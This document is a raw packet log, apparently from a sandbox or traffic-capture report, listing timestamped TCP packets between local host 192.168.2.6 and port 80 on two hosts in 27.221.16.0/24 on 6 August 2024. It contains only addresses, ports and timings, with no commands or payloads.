                                                                                                                                    Aug 6, 2024 10:30:14.075316906 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075320959 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.075328112 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075351954 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.075361967 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.075392962 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075403929 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075413942 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075427055 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075439930 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075442076 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.075462103 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.075484037 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.075494051 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075505972 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075515985 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075551033 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.075942039 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075952053 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.075963020 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076004028 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076019049 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076020956 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076030016 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076034069 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076113939 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076126099 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076136112 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076143980 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076147079 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076231956 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076242924 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076252937 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076258898 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076258898 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076258898 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076271057 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076281071 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076292038 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076303005 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076303959 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076303959 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076345921 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076356888 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076363087 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076373100 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076384068 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076395035 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076419115 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076419115 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076447010 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076467991 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076478958 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076494932 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076504946 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076517105 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076545000 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076571941 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076642036 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076652050 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076662064 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076673031 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076683998 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076694012 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076704025 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076704025 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076704025 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076715946 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076726913 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076728106 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076738119 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.076751947 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.076805115 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.390513897 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390537977 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390552998 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390607119 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390619040 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390630007 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390641928 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390665054 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.390711069 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.390821934 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390835047 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390851974 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390870094 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390881062 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390881062 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.390892029 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390902996 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390913010 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390913963 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.390923977 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390935898 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390937090 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.390966892 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.390969992 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390981913 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.390984058 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.390993118 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391004086 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391016006 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391026020 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.391057968 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.391069889 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.391273022 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391289949 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391300917 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391341925 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.391460896 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391514063 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391525030 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391535044 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391549110 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391558886 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391566038 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.391566038 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.391571045 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391613960 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.391613960 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.391659021 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391670942 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391680956 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391690969 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391702890 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391767025 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391777992 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.391789913 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.391789913 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.391819954 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392256975 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392273903 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392286062 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392296076 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392306089 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392307997 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392319918 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392350912 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392369032 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392384052 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392395020 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392405033 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392416000 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392426014 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392437935 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392450094 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392450094 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392503023 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392518997 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392529964 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392540932 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392558098 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392568111 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392570019 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392579079 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392584085 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392589092 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392600060 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392610073 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392620087 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392643929 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392643929 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392736912 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.392874002 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.392980099 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.735549927 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735639095 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735651016 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735668898 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735680103 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735691071 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735702991 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735708952 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.735713959 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735733986 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.735800028 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735847950 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.735876083 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735888958 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735899925 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735918045 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735929012 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735940933 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.735958099 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.735958099 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736067057 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736078024 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736088991 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736100912 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736107111 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736109972 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736109972 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736140013 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736192942 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736197948 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736203909 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736215115 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736246109 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736255884 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736257076 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736267090 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736279011 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736316919 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736316919 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736416101 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736447096 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736457109 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736464024 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736509085 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736536026 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736546993 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736557961 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736568928 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736608982 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736654043 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736665964 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736675024 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736685991 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736696005 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736707926 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.736737967 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736737967 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736737967 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.736814022 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:14.742105961 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:14.742176056 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:16.094461918 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:16.100075960 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:16.100202084 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:16.100404024 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:16.106178045 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256010056 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256047964 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256059885 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256072044 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256089926 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256099939 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256110907 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256145954 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256154060 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.256156921 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256169081 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.256179094 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.256230116 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.256230116 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.261504889 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.261548996 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.261624098 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.587958097 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.588048935 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.588059902 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.588073015 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.588084936 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.588169098 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.588169098 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.588253975 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.588299990 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.588310957 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.588326931 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.588336945 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.588336945 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.588336945 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.588424921 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.589138985 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.589148998 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.589159966 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.589193106 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.589204073 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.589294910 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.589294910 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.897088051 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897219896 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897244930 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897257090 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897283077 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897306919 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.897306919 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.897349119 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897524118 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.897701979 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897773027 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897783041 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897816896 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.897953033 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897964001 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.897981882 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.898000956 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.898063898 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.898838997 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.898849964 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.898929119 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.898940086 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.898950100 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:17.899024963 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.899024963 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:17.942766905 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.246411085 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.246429920 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.246448994 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.246459007 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.246470928 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.246567011 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.246577978 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.246587992 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.246601105 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.246925116 CEST4977780192.168.2.627.221.16.179
